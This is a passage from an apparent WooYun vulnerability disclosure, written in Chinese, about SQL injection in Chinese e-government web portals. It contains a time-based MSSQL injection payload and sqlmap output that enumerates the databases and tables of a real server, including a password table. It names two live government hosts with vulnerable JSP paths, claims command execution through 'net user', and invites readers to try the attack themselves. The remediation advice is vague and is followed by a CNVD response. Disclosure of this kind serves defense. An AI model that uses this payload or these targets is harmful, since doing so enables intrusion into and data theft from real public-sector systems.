    Payload: qid=1 WAITFOR DELAY '0:0:5'--
---
[03:09:56] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
[03:09:56] [INFO] fetching database names
[03:09:57] [WARNING] reflective value(s) found and filtering out
[03:09:57] [INFO] the SQL query used returns 13 entries
[03:09:57] [INFO] retrieved: "Egh"
[03:09:57] [INFO] retrieved: "EghFiles"
[03:09:57] [INFO] retrieved: "master"
[03:09:57] [INFO] retrieved: "model"
[03:09:58] [INFO] retrieved: "msdb"
[03:09:58] [INFO] retrieved: "ReportServer"
[03:09:58] [INFO] retrieved: "ReportServerTempDB"
[03:09:58] [INFO] retrieved: "tempdb"
[03:09:59] [INFO] retrieved: "tyfocontent"
[03:09:59] [INFO] retrieved: "tyfoinvestigate"
[03:09:59] [INFO] retrieved: "tyfomsg"
[03:09:59] [INFO] retrieved: "tyfopublish"
[03:10:00] [INFO] retrieved: "tyfosearch"
[03:10:00] [INFO] fetching tables for databases: Egh, EghFiles, ReportServer, Re
portServerTempDB, master, model, msdb, tempdb, tyfocontent, tyfoinvestigate, tyf
omsg, tyfopublish, tyfosearch
[03:10:00] [INFO] the SQL query used returns 66 entries
[03:10:01] [INFO] retrieved: "dbo.AppProject"
[03:10:01] [INFO] retrieved: "dbo.Appraise"
[03:10:01] [INFO] retrieved: "dbo.BackUserPwd"
[03:10:02] [INFO] retrieved: "dbo.Complaints"
[03:10:02] [INFO] retrieved: "dbo.ConsultLabel"
[03:10:02] [INFO] retrieved: "dbo.ConvenienceCenter"
[03:10:03] [INFO] retrieved: "dbo.D99_Tmp"
[03:10:03] [INFO] retrieved: "dbo.data_file"
[03:10:03] [INFO] retrieved: "dbo.DateSet"
[03:10:04] [INFO] retrieved: "dbo.Datum"
[03:10:04] [INFO] retrieved: "dbo.datumlegend"
[03:10:04] [INFO] retrieved: "dbo.FlowSet"
[03:10:04] [INFO] retrieved: "dbo.FlowShip"
[03:10:05] [INFO] retrieved: "dbo.FlowTurnOut"
[03:10:05] [INFO] retrieved: "dbo.GscApproveConditionSet"
[03:10:05] [INFO] retrieved: "dbo.GscDay"
[03:10:06] [INFO] retrieved: "dbo.GscOrgan"
[03:10:06] [INFO] retrieved: "dbo.GscPubUser"
[03:10:06] [INFO] retrieved: "dbo.GscUser"
[03:10:09] [INFO] retrieved: "dbo.HandedData"
[03:10:09] [INFO] retrieved: "dbo.HandedDataFile"
[03:10:09] [INFO] retrieved: "dbo.KB_KEYWORD"
[03:10:09] [INFO] retrieved: "dbo.KB_QUESTION_ANSWER"
[03:10:10] [INFO] retrieved: "dbo.KB_SAME_KEY"
[03:10:10] [INFO] retrieved: "dbo.KB_WORD_QUESTION"
[03:10:10] [INFO] retrieved: "dbo.Label_UserPriority"


没跑完的,表太多了= =每个站都是那么多挺吓人,
0x8完结

直接沦陷服务器


每个站都很奇葩,权限都非常非常大 直接执行net user

http://egov.fszw.cn:8080/questerOffLine/db4645f765d54f7398771141acb63515.jsp


我们先用这个站试试权限如何:

1212.png


1212.png


12121212.png


成功一个,在来一个试试:

http://egov.pzhzw.gov.cn:8080/questerOffLine/4358f2126aee44e4917310e0aade61d5.jsp


1111111111111111.png


22222222222222.png


全部成功、不信你试试。
好了这个洞就到这里吧 点到为止。

修复方案:

1.认证过滤
2.注入过滤
3.还是过滤
4.还是过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-09 16:24

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无